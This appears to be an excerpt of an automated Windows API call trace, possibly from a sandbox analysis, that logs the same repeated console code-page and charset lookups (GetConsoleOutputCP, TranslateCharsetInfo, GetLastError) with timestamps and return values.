	[0090.349] GetConsoleOutputCP () returned 0x1b5
	[0090.349] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.349] GetLastError () returned 0xcb
	[0090.349] GetConsoleOutputCP () returned 0x1b5
	[0090.349] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.349] GetLastError () returned 0xcb
	[0090.349] GetConsoleOutputCP () returned 0x1b5
	[0090.349] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.349] GetLastError () returned 0xcb
	[0090.349] GetConsoleOutputCP () returned 0x1b5
	[0090.349] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.350] GetLastError () returned 0xcb
	[0090.350] GetConsoleOutputCP () returned 0x1b5
	[0090.350] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.350] GetLastError () returned 0xcb
	[0090.350] GetConsoleOutputCP () returned 0x1b5
	[0090.350] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.350] GetLastError () returned 0xcb
	[0090.350] GetConsoleOutputCP () returned 0x1b5
	[0090.350] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.350] GetLastError () returned 0xcb
	[0090.350] GetConsoleOutputCP () returned 0x1b5
	[0090.350] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.350] GetLastError () returned 0xcb
	[0090.350] GetConsoleOutputCP () returned 0x1b5
	[0090.350] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.350] GetLastError () returned 0xcb
	[0090.350] GetConsoleOutputCP () returned 0x1b5
	[0090.350] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.350] GetLastError () returned 0xcb
	[0090.350] GetConsoleOutputCP () returned 0x1b5
	[0090.350] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.350] GetLastError () returned 0xcb
	[0090.350] GetConsoleOutputCP () returned 0x1b5
	[0090.351] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.351] GetLastError () returned 0xcb
	[0090.351] GetConsoleOutputCP () returned 0x1b5
	[0090.351] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.351] GetLastError () returned 0xcb
	[0090.351] GetConsoleOutputCP () returned 0x1b5
	[0090.351] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.351] GetLastError () returned 0xcb
	[0090.351] GetConsoleOutputCP () returned 0x1b5
	[0090.351] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.351] GetLastError () returned 0xcb
	[0090.351] GetConsoleOutputCP () returned 0x1b5
	[0090.351] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.351] GetLastError () returned 0xcb
	[0090.351] GetConsoleOutputCP () returned 0x1b5
	[0090.351] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.351] GetLastError () returned 0xcb
	[0090.351] GetConsoleOutputCP () returned 0x1b5
	[0090.351] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.351] GetLastError () returned 0xcb
	[0090.351] GetConsoleOutputCP () returned 0x1b5
	[0090.351] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.351] GetLastError () returned 0xcb
	[0090.351] GetConsoleOutputCP () returned 0x1b5
	[0090.352] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.352] GetLastError () returned 0xcb
	[0090.352] GetConsoleOutputCP () returned 0x1b5
	[0090.352] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.352] GetLastError () returned 0xcb
	[0090.352] GetConsoleOutputCP () returned 0x1b5
	[0090.352] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.352] GetLastError () returned 0xcb
	[0090.352] GetConsoleOutputCP () returned 0x1b5
	[0090.352] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.352] GetLastError () returned 0xcb
	[0090.352] GetConsoleOutputCP () returned 0x1b5
	[0090.352] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.352] GetLastError () returned 0xcb
	[0090.352] GetConsoleOutputCP () returned 0x1b5
	[0090.352] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.352] GetLastError () returned 0xcb
	[0090.352] GetConsoleOutputCP () returned 0x1b5
	[0090.352] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.352] GetLastError () returned 0xcb
	[0090.352] GetConsoleOutputCP () returned 0x1b5
	[0090.352] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.352] GetLastError () returned 0xcb
	[0090.352] GetConsoleOutputCP () returned 0x1b5
	[0090.353] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.353] GetLastError () returned 0xcb
	[0090.353] GetConsoleOutputCP () returned 0x1b5
	[0090.353] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.353] GetLastError () returned 0xcb
	[0090.353] GetConsoleOutputCP () returned 0x1b5
	[0090.353] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.353] GetLastError () returned 0xcb
	[0090.353] GetConsoleOutputCP () returned 0x1b5
	[0090.353] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.353] GetLastError () returned 0xcb
	[0090.353] GetConsoleOutputCP () returned 0x1b5
	[0090.353] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.353] GetLastError () returned 0xcb
	[0090.353] GetConsoleOutputCP () returned 0x1b5
	[0090.353] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.353] GetLastError () returned 0xcb
	[0090.353] GetConsoleOutputCP () returned 0x1b5
	[0090.353] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.353] GetLastError () returned 0xcb
	[0090.353] GetConsoleOutputCP () returned 0x1b5
	[0090.353] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.353] GetLastError () returned 0xcb
	[0090.353] GetConsoleOutputCP () returned 0x1b5
	[0090.353] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.353] GetLastError () returned 0xcb
	[0090.353] GetConsoleOutputCP () returned 0x1b5
	[0090.354] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.354] GetLastError () returned 0xcb
	[0090.354] GetConsoleOutputCP () returned 0x1b5
	[0090.354] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.354] GetLastError () returned 0xcb
	[0090.354] GetConsoleOutputCP () returned 0x1b5
	[0090.354] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.354] GetLastError () returned 0xcb
	[0090.354] GetConsoleOutputCP () returned 0x1b5
	[0090.354] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.354] GetLastError () returned 0xcb
	[0090.354] GetConsoleOutputCP () returned 0x1b5
	[0090.354] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.354] GetLastError () returned 0xcb
	[0090.354] GetConsoleOutputCP () returned 0x1b5
	[0090.354] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.354] GetLastError () returned 0xcb
	[0090.354] GetConsoleOutputCP () returned 0x1b5
	[0090.354] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.354] GetLastError () returned 0xcb
	[0090.354] GetConsoleOutputCP () returned 0x1b5
	[0090.354] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.354] GetLastError () returned 0xcb
	[0090.354] GetConsoleOutputCP () returned 0x1b5
	[0090.354] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.355] GetLastError () returned 0xcb
	[0090.355] GetConsoleOutputCP () returned 0x1b5
	[0090.355] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.355] GetLastError () returned 0xcb
	[0090.355] GetConsoleOutputCP () returned 0x1b5
	[0090.355] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.355] GetLastError () returned 0xcb
	[0090.355] GetConsoleOutputCP () returned 0x1b5
	[0090.355] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.355] GetLastError () returned 0xcb
	[0090.355] GetConsoleOutputCP () returned 0x1b5
	[0090.355] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.355] GetLastError () returned 0xcb
	[0090.355] GetConsoleOutputCP () returned 0x1b5
	[0090.355] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.355] GetLastError () returned 0xcb
	[0090.355] GetConsoleOutputCP () returned 0x1b5
	[0090.355] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.355] GetLastError () returned 0xcb
	[0090.355] GetConsoleOutputCP () returned 0x1b5
	[0090.355] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.355] GetLastError () returned 0xcb
	[0090.355] GetConsoleOutputCP () returned 0x1b5
	[0090.355] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.355] GetLastError () returned 0xcb
	[0090.355] GetConsoleOutputCP () returned 0x1b5
	[0090.356] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.356] GetLastError () returned 0xcb
	[0090.356] GetConsoleOutputCP () returned 0x1b5
	[0090.356] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.356] GetLastError () returned 0xcb
	[0090.356] GetConsoleOutputCP () returned 0x1b5
	[0090.356] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.356] GetLastError () returned 0xcb
	[0090.356] GetConsoleOutputCP () returned 0x1b5
	[0090.356] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.356] GetLastError () returned 0xcb
	[0090.356] GetConsoleOutputCP () returned 0x1b5
	[0090.356] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.356] GetLastError () returned 0xcb
	[0090.356] GetConsoleOutputCP () returned 0x1b5
	[0090.356] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.356] GetLastError () returned 0xcb
	[0090.356] GetConsoleOutputCP () returned 0x1b5
	[0090.356] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.356] GetLastError () returned 0xcb
	[0090.356] GetConsoleOutputCP () returned 0x1b5
	[0090.357] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.357] GetLastError () returned 0xcb
	[0090.357] GetConsoleOutputCP () returned 0x1b5
	[0090.357] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.357] GetLastError () returned 0xcb
	[0090.357] GetConsoleOutputCP () returned 0x1b5
	[0090.357] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.357] GetLastError () returned 0xcb
	[0090.357] GetConsoleOutputCP () returned 0x1b5
	[0090.357] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.357] GetLastError () returned 0xcb
	[0090.357] GetConsoleOutputCP () returned 0x1b5
	[0090.357] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.357] GetLastError () returned 0xcb
	[0090.357] GetConsoleOutputCP () returned 0x1b5
	[0090.357] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.357] GetLastError () returned 0xcb
	[0090.357] GetConsoleOutputCP () returned 0x1b5
	[0090.357] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.357] GetLastError () returned 0xcb
	[0090.357] GetConsoleOutputCP () returned 0x1b5
	[0090.357] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.357] GetLastError () returned 0xcb
	[0090.357] GetConsoleOutputCP () returned 0x1b5
	[0090.357] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.357] GetLastError () returned 0xcb
	[0090.357] GetConsoleOutputCP () returned 0x1b5
	[0090.358] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.358] GetLastError () returned 0xcb
	[0090.358] GetConsoleOutputCP () returned 0x1b5
	[0090.358] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.358] GetLastError () returned 0xcb
	[0090.358] GetConsoleOutputCP () returned 0x1b5
	[0090.358] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.358] GetLastError () returned 0xcb
	[0090.358] GetConsoleOutputCP () returned 0x1b5
	[0090.358] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.358] GetLastError () returned 0xcb
	[0090.358] GetConsoleOutputCP () returned 0x1b5
	[0090.358] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.358] GetLastError () returned 0xcb
	[0090.358] GetConsoleOutputCP () returned 0x1b5
	[0090.358] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea40, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea40) returned 0
	[0090.358] GetLastError () returned 0xcb
	[0090.358] GetConsoleOutputCP () returned 0x1b5
	[0090.358] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea40, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea40) returned 0
	[0090.358] GetLastError () returned 0xcb
	[0090.358] GetConsoleOutputCP () returned 0x1b5
	[0090.358] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea40, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea40) returned 0
	[0090.358] GetLastError () returned 0xcb
	[0090.358] GetConsoleOutputCP () returned 0x1b5
	[0090.358] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea40, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea40) returned 0
	[0090.358] GetLastError () returned 0xcb
	[0090.359] GetConsoleOutputCP () returned 0x1b5
	[0090.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea40, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea40) returned 0
	[0090.359] GetLastError () returned 0xcb
	[0090.359] GetConsoleOutputCP () returned 0x1b5
	[0090.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.359] GetLastError () returned 0xcb
	[0090.359] GetConsoleOutputCP () returned 0x1b5
	[0090.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.359] GetLastError () returned 0xcb
	[0090.359] GetConsoleOutputCP () returned 0x1b5
	[0090.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.359] GetLastError () returned 0xcb
	[0090.359] GetConsoleOutputCP () returned 0x1b5
	[0090.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.359] GetLastError () returned 0xcb
	[0090.359] GetConsoleOutputCP () returned 0x1b5
	[0090.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.359] GetLastError () returned 0xcb
	[0090.359] GetConsoleOutputCP () returned 0x1b5
	[0090.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.359] GetLastError () returned 0xcb
	[0090.359] GetConsoleOutputCP () returned 0x1b5
	[0090.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.359] GetLastError () returned 0xcb
	[0090.359] GetConsoleOutputCP () returned 0x1b5
	[0090.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.360] GetLastError () returned 0xcb
	[0090.360] GetConsoleOutputCP () returned 0x1b5
	[0090.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.360] GetLastError () returned 0xcb
	[0090.360] GetConsoleOutputCP () returned 0x1b5
	[0090.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.360] GetLastError () returned 0xcb
	[0090.360] GetConsoleOutputCP () returned 0x1b5
	[0090.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.360] GetLastError () returned 0xcb
	[0090.360] GetConsoleOutputCP () returned 0x1b5
	[0090.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.360] GetLastError () returned 0xcb
	[0090.360] GetConsoleOutputCP () returned 0x1b5
	[0090.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.360] GetLastError () returned 0xcb
	[0090.360] GetConsoleOutputCP () returned 0x1b5
	[0090.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.360] GetLastError () returned 0xcb
	[0090.360] GetConsoleOutputCP () returned 0x1b5
	[0090.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.360] GetLastError () returned 0xcb
	[0090.361] GetConsoleOutputCP () returned 0x1b5
	[0090.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.361] GetLastError () returned 0xcb
	[0090.361] GetConsoleOutputCP () returned 0x1b5
	[0090.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.361] GetLastError () returned 0xcb
	[0090.361] GetConsoleOutputCP () returned 0x1b5
	[0090.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.361] GetLastError () returned 0xcb
	[0090.361] GetConsoleOutputCP () returned 0x1b5
	[0090.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.361] GetLastError () returned 0xcb
	[0090.361] GetConsoleOutputCP () returned 0x1b5
	[0090.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.361] GetLastError () returned 0xcb
	[0090.361] GetConsoleOutputCP () returned 0x1b5
	[0090.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.362] GetLastError () returned 0xcb
	[0090.362] GetConsoleOutputCP () returned 0x1b5
	[0090.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.362] GetLastError () returned 0xcb
	[0090.362] GetConsoleOutputCP () returned 0x1b5
	[0090.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.362] GetLastError () returned 0xcb
	[0090.362] GetConsoleOutputCP () returned 0x1b5
	[0090.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.362] GetLastError () returned 0xcb
	[0090.362] GetConsoleOutputCP () returned 0x1b5
	[0090.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.362] GetLastError () returned 0xcb
	[0090.362] GetConsoleOutputCP () returned 0x1b5
	[0090.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.362] GetLastError () returned 0xcb
	[0090.362] GetConsoleOutputCP () returned 0x1b5
	[0090.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.362] GetLastError () returned 0xcb
	[0090.362] GetConsoleOutputCP () returned 0x1b5
	[0090.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.363] GetLastError () returned 0xcb
	[0090.363] GetConsoleOutputCP () returned 0x1b5
	[0090.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.363] GetLastError () returned 0xcb
	[0090.363] GetConsoleOutputCP () returned 0x1b5
	[0090.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.363] GetLastError () returned 0xcb
	[0090.363] GetConsoleOutputCP () returned 0x1b5
	[0090.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.363] GetLastError () returned 0xcb
	[0090.363] GetConsoleOutputCP () returned 0x1b5
